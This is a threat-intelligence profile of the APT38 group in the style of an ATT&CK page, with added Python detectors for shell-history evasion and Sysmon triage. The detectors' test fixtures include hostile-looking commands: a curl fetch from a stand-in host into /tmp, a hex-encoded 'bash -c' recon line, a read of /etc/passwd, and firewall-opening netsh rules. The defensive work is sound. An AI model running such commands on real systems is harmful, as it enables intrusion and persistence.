
APT38

APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
ID: G0082
Associated Groups: BeagleBoyz, Stardust Chollima, Bluenoroff, Sapphire Sleet, COPERNICIUM, NICKEL GLADSTONE
Version: 3.1
Created: 29 Jan 2019
Last Modified: 22 Jan 2025

Associated Group Descriptions

Name Description
BeagleBoyz (Citation: CISA AA20-239A BeagleBoyz August 2020)
Stardust Chollima (Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)
Bluenoroff (Citation: Kaspersky Lazarus Under The Hood Blog 2017)
Sapphire Sleet (Citation: Microsoft Threat Actor Naming July 2023)
COPERNICIUM (Citation: Microsoft Threat Actor Naming July 2023)
NICKEL GLADSTONE (Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)

Techniques Used

Domain ID Name Use
Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

APT38 has used the legitimate application `ieinstal.exe` to bypass UAC.(Citation: 1 - appv)

Enterprise T1583 .001 Acquire Infrastructure: Domains

APT38 has created fake domains to imitate legitimate venture capital or bank domains.(Citation: 1 - appv)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT38 has used PowerShell to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.003 Command and Scripting Interpreter: Windows Command Shell

APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.(Citation: FireEye APT38 Oct 2018) Additionally, APT38 has used batch scripts.(Citation: 1 - appv)

.005 Command and Scripting Interpreter: Visual Basic

APT38 has used VBScript to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: 1 - appv)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT38 has installed a new Windows service to establish persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1565 .001 Data Manipulation: Stored Data Manipulation

APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.(Citation: FireEye APT38 Oct 2018)

.002 Data Manipulation: Transmitted Data Manipulation

APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.(Citation: FireEye APT38 Oct 2018)

.003 Data Manipulation: Runtime Data Manipulation

APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.(Citation: FireEye APT38 Oct 2018)

Enterprise T1561 .002 Disk Wipe: Disk Structure Wipe

APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.(Citation: FireEye APT38 Oct 2018)

Enterprise T1480 .002 Execution Guardrails: Mutual Exclusion

APT38 has created a mutex to avoid duplicate execution.(Citation: 1 - appv)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

APT38 has unhooked DLLs to disable endpoint detection and response (EDR) or anti-virus (AV) tools.(Citation: 1 - appv)

.003 Impair Defenses: Impair Command History Logging

APT38 has prepended a space to all of their terminal commands so that, under the Bash HISTCONTROL=ignorespace (or ignoreboth) setting, the commands are never written to shell history.(Citation: CISA AA20-239A BeagleBoyz August 2020)
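Because HISTCONTROL drops space-prefixed lines before they reach the history file, `.bash_history` alone understates what an operator ran; the kernel audit trail does not consult HISTCONTROL. The following is an added example, not code from the ATT&CK entry or the cited advisory: it reconciles Linux audit EXECVE records (as produced by an auditd rule such as `-a always,exit -F arch=b64 -S execve`) against a user's history file and reports commands that executed but were never recorded. The audit lines and history file are constructed for the example; the argument decoding follows auditd's real convention of writing arguments that contain spaces or quotes as unquoted hex.

```python
"""Added example (not from the ATT&CK page): find commands that appear in the
Linux audit execve trail but never made it into ~/.bash_history."""
import re
import shlex

# Constructed auditd EXECVE records. auditd writes each argv element as
# aN="..." when it is printable without spaces/quotes, otherwise as an
# unquoted hex string (record 203 below carries a2 = "id; uname -a" in hex).
# Long arguments split into aN_len chunks are not handled here.
AUDIT_LOG = """\
type=EXECVE msg=audit(1598000001.101:201): argc=2 a0="ls" a1="-la"
type=EXECVE msg=audit(1598000002.102:202): argc=4 a0="curl" a1="-o" a2="/tmp/.x" a3="http://example.invalid/x"
type=EXECVE msg=audit(1598000003.103:203): argc=3 a0="bash" a1="-c" a2=69643B20756E616D65202D61
type=EXECVE msg=audit(1598000004.104:204): argc=2 a0="cat" a1="/etc/passwd"
type=EXECVE msg=audit(1598000004.105:205): argc=2 a0="grep" a1="root"
"""

# Constructed history file for the same session. Records 202 and 203 were typed
# with a leading space under HISTCONTROL=ignorespace, so bash never wrote them;
# 204 and 205 are the two stages of a pipeline that history keeps as one line.
# The '#1598000001' line is a HISTTIMEFORMAT timestamp and must be skipped.
BASH_HISTORY = """\
#1598000001
ls -la
cat /etc/passwd | grep root
"""

RECORD_RE = re.compile(r"^type=EXECVE msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<rest>.*)$")
ARG_RE = re.compile(r'\ba(?P<idx>\d+)=(?:"(?P<plain>[^"]*)"|(?P<hex>[0-9A-Fa-f]+))')


def parse_execve(log):
    """Yield (serial, argv) for each EXECVE record, decoding hex-encoded args."""
    for line in log.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        args = {}
        for a in ARG_RE.finditer(m.group("rest")):
            if a.group("plain") is not None:
                args[int(a.group("idx"))] = a.group("plain")
            else:
                args[int(a.group("idx"))] = bytes.fromhex(a.group("hex")).decode("utf-8", "replace")
        yield m.group("serial"), [args[i] for i in sorted(args)]


def normalize(cmd):
    """Collapse whitespace so quoting/spacing differences do not hide a match."""
    return " ".join(cmd.split())


def missing_from_history(audit_log, history_text):
    """Return [(serial, command)] for execve records with no matching history line.

    A record counts as covered when its shell-quoted argv appears inside any
    history line, so one stage of a pipeline or a command run under sudo still
    matches the single line bash stored for it.
    """
    hist = [normalize(l) for l in history_text.splitlines()
            if l.strip() and not l.startswith("#")]
    gaps = []
    for serial, argv in parse_execve(audit_log):
        cmd = normalize(shlex.join(argv))
        if not any(cmd in h for h in hist):
            gaps.append((serial, cmd))
    return gaps


if __name__ == "__main__":
    for serial, cmd in missing_from_history(AUDIT_LOG, BASH_HISTORY):
        print(f"audit serial {serial}: executed but absent from history: {cmd}")
```

Two caveats when running this against real hosts: bash writes the history file only when the shell exits (unless `PROMPT_COMMAND` flushes it), so a live session always shows a gap, and an operator who runs `unset HISTFILE` or `kill -9 $$` leaves no history at all. The execve trail, or equivalent EDR process telemetry, is the record to trust; the history file is only corroboration.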

.004 Impair Defenses: Disable or Modify System Firewall

APT38 has created firewall exemptions for specific ports, including ports 443, 6443, 8443, and 9443.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT38 clears Windows Event Logs, including the Sysmon operational log channel, from compromised systems.(Citation: FireEye APT38 Oct 2018)

.004 Indicator Removal: File Deletion

APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)

.006 Indicator Removal: Timestomp

APT38 has modified file timestamps to match those of other files in the same folder on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1056 .001 Input Capture: Keylogging

APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.(Citation: FireEye APT38 Oct 2018)

Enterprise T1036 .003 Masquerading: Rename Legitimate Utilities

APT38 has renamed system utilities, such as `rundll32.exe` and `mshta.exe`, to avoid detection.(Citation: 1 - appv)

.006 Masquerading: Space after Filename

APT38 has put several spaces before a file extension to avoid detection and suspicion.(Citation: 1 - appv)

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.(Citation: FireEye APT38 Oct 2018)

Enterprise T1588 .002 Obtain Capabilities: Tool

APT38 has obtained and used open-source tools such as Mimikatz.(Citation: ESET Lazarus KillDisk April 2018)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT38 has conducted spearphishing campaigns using malicious email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1053 .003 Scheduled Task/Job: Cron

APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.005 Scheduled Task/Job: Scheduled Task

APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020) Additionally, APT38 has used living-off-the-land scripts to execute a malicious script via a scheduled task.(Citation: 1 - appv)

Enterprise T1505 .003 Server Software Component: Web Shell

APT38 has used web shells for persistence or to ensure redundant access.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: 1 - appv)

Enterprise T1553 .005 Subvert Trust Controls: Mark-of-the-Web Bypass

APT38 has used ISO and VHD files to deploy malware and to bypass Mark-of-the-Web (MOTW) security measures.(Citation: 1 - appv)

Enterprise T1218 .001 System Binary Proxy Execution: Compiled HTML File

APT38 has used CHM files to move concealed payloads.(Citation: Kaspersky Lazarus Under The Hood APR 2017)

.005 System Binary Proxy Execution: Mshta

APT38 has used a renamed version of `mshta.exe` to execute malicious HTML files.(Citation: 1 - appv)

.007 System Binary Proxy Execution: Msiexec

APT38 has used `msiexec.exe` to execute malicious files.(Citation: 1 - appv)

.011 System Binary Proxy Execution: Rundll32

APT38 has used `rundll32.exe` to execute binaries, scripts, and Control Panel Item files, proxying execution through a trusted system binary to avoid triggering security tools.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: 1 - appv)
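Several of the entries above (renamed `rundll32.exe`/`mshta.exe`, the firewall exemptions on 443/6443/8443/9443, and whitespace padded in front of a file extension) are visible in ordinary endpoint telemetry. The following is an added example, not code from the ATT&CK entry or any cited report: a Python triage pass over Sysmon process-creation (Event ID 1) and file-creation (Event ID 11) records. The records are constructed for the example; the field names (Image, OriginalFileName, CommandLine, TargetFilename) are Sysmon's own. The renamed-binary check relies on the OriginalFileName field, which Sysmon reads from the PE version resource, so a copy with a patched resource would evade it; hash or signature checks are the stronger control.

```python
"""Added example (not from the ATT&CK page): triage constructed Sysmon records
for renamed system binaries, inbound firewall exemptions on the ports named in
the CISA advisory, and file names padded with spaces before the extension."""
import re

# Binaries the page reports APT38 renaming or proxying through; extend as needed.
WATCHED_BINARIES = {"rundll32.exe", "mshta.exe", "msiexec.exe"}
# Ports named in CISA AA20-239A.
WATCHED_PORTS = {443, 6443, 8443, 9443}

NETSH_ADD_RE = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b(?P<args>.*)", re.I)
PS_RULE_RE = re.compile(r"New-NetFirewallRule\b(?P<args>.*)", re.I)
# Two or more spaces between a non-space character and a short final extension.
PADDED_EXT_RE = re.compile(r"\S\s{2,}\.[A-Za-z0-9]{1,4}$")

# Constructed Sysmon records, shaped like an XML-to-dict export of the event data.
SYSMON_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"EventID": 1, "Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"svchost.exe C:\Users\Public\update.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe", "OriginalFileName": "netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="Core Networking" dir=in '
                    "action=allow protocol=TCP localport=443,6443,8443,9443"},
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe", "OriginalFileName": "netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="Web" dir=in action=allow protocol=TCP localport=80'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell.exe -NoProfile -Command "New-NetFirewallRule -DisplayName Sync '
                    '-Direction Inbound -Protocol TCP -LocalPort 9443"'},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\statement_2020.pdf          .exe"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\statement_2020.pdf"},
]


def basename(path):
    return re.split(r"[\\/]", path)[-1]


def expand_ports(spec):
    """Expand netsh/PowerShell port syntax such as '443,8000-9000' into a set of ints."""
    ports = set()
    for tok in spec.split(","):
        lo, _, hi = tok.partition("-")
        if lo.isdigit():
            ports.update(range(int(lo), (int(hi) if hi.isdigit() else int(lo)) + 1))
    return ports


def allowed_inbound_ports(cmdline):
    """Ports opened inbound by a netsh or New-NetFirewallRule allow rule (empty set if none)."""
    m = NETSH_ADD_RE.search(cmdline)
    if m:
        args = m.group("args")
        if re.search(r"\bdir=in\b", args, re.I) and re.search(r"\baction=allow\b", args, re.I):
            pm = re.search(r"\blocalport=(?P<p>[\d,\-]+)", args, re.I)
            return expand_ports(pm.group("p")) if pm else set()
        return set()
    m = PS_RULE_RE.search(cmdline)
    if m:
        args = m.group("args")
        # New-NetFirewallRule defaults to -Action Allow and -Direction Inbound.
        if re.search(r"-Action\s+Block\b", args, re.I) or re.search(r"-Direction\s+Outbound\b", args, re.I):
            return set()
        pm = re.search(r"-LocalPort\s+(?P<p>[\d,\-]+)", args, re.I)
        return expand_ports(pm.group("p")) if pm else set()
    return set()


def triage(events):
    """Return [(event_index, finding)] for every pattern matched in the event list."""
    findings = []
    for i, ev in enumerate(events):
        image = basename(ev.get("Image", "")).lower()
        if ev.get("EventID") == 1:
            original = ev.get("OriginalFileName", "").lower()
            if original in WATCHED_BINARIES and image != original:
                findings.append((i, f"{original} renamed to {image}"))
            hit = allowed_inbound_ports(ev.get("CommandLine", "")) & WATCHED_PORTS
            if hit:
                findings.append((i, f"inbound allow rule for ports {sorted(hit)}"))
        name = basename(ev.get("TargetFilename") or ev.get("Image", ""))
        if PADDED_EXT_RE.search(name):
            findings.append((i, f"whitespace-padded extension in {name!r}"))
    return findings


if __name__ == "__main__":
    for idx, finding in triage(SYSMON_EVENTS):
        print(f"event {idx}: {finding}")
```

The port check deliberately ignores the rule for port 80 and outbound rules; widen `WATCHED_PORTS`, or drop the intersection entirely to flag every command-line firewall change, once the environment's baseline is known.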

Enterprise T1569 .002 System Services: Service Execution

APT38 has created new services or modified existing ones to run executables, commands, or scripts.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1204 .001 User Execution: Malicious Link

APT38 has used links to execute a malicious Visual Basic script.(Citation: 1 - appv)

.002 User Execution: Malicious File

APT38 has attempted to lure victims into enabling malicious macros within email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020) Additionally, APT38 has used malicious Word documents and shortcut files.(Citation: 1 - appv)

Software

ID Name References Techniques

S0039 Net
References: (Citation: FireEye APT38 Oct 2018) (Citation: Microsoft Net Utility) (Citation: Savill 1999)
Techniques: Password Policy Discovery, Domain Groups, System Time Discovery, Domain Account, Local Account, System Service Discovery, Remote System Discovery, Network Share Discovery, System Network Connections Discovery, Network Share Connection Removal, Service Execution, Local Account, Additional Local or Domain Groups, Local Groups, SMB/Windows Admin Shares, Domain Account

S0376 HOPLIGHT
References: (Citation: CISA AA20-239A BeagleBoyz August 2020) (Citation: US-CERT HOPLIGHT Apr 2019)
Techniques: Device Driver Discovery, Modify Registry, Fallback Channels, Query Registry, Proxy, Non-Standard Port, Commonly Used Port, Pass the Hash, File and Directory Discovery, Security Account Manager, Windows Command Shell, Exfiltration Over C2 Channel, Standard Encoding, System Information Discovery, Windows Management Instrumentation Event Subscription, Service Execution, Ingress Tool Transfer, Windows Management Instrumentation, Uncommonly Used Port, Disable or Modify System Firewall, System Time Discovery, Process Injection

S0334 DarkComet
References: (Citation: DarkKomet) (Citation: FireEye APT38 Oct 2018) (Citation: FYNLOS) (Citation: Fynloski) (Citation: Krademok) (Citation: Malwarebytes DarkComet March 2018) (Citation: TrendMicro DarkComet Sept 2014)
Techniques: Command and Scripting Interpreter, Clipboard Data, Video Capture, System Information Discovery, Ingress Tool Transfer, Process Discovery, Windows Command Shell, Disable or Modify System Firewall, Remote Desktop Protocol, Registry Run Keys / Startup Folder, Web Protocols, Audio Capture, Disable or Modify Tools, Software Packing, Modify Registry, Keylogging, System Owner/User Discovery, Match Legitimate Resource Name or Location

S0002 Mimikatz
References: (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: FireEye APT38 Oct 2018)
Techniques: DCSync, Credentials from Password Stores, Rogue Domain Controller, Private Keys, SID-History Injection, Security Support Provider, Pass the Hash, Account Manipulation, Pass the Ticket, Credentials from Web Browsers, Golden Ticket, Security Account Manager, LSASS Memory, Silver Ticket, Windows Credential Manager, Steal or Forge Authentication Certificates, LSA Secrets

S0607 KillDisk
References: (Citation: ESEST Black Energy Jan 2016) (Citation: ESET Lazarus KillDisk April 2018) (Citation: KillDisk Ransomware) (Citation: Trend Micro KillDisk 1) (Citation: Trend Micro KillDisk 2)
Techniques: File and Directory Discovery, Native API, System Information Discovery, Shared Modules, Process Discovery, Obfuscated Files or Information, Service Stop, Clear Windows Event Logs, System Shutdown/Reboot, Disk Structure Wipe, Data Encrypted for Impact, File Deletion, Masquerade Task or Service, Access Token Manipulation, Data Destruction

S0593 ECCENTRICBANDWAGON
References: (Citation: CISA AA20-239A BeagleBoyz August 2020) (Citation: CISA EB Aug 2020)
Techniques: File Deletion, Obfuscated Files or Information, Windows Command Shell, Screen Capture, Keylogging, Local Data Staging
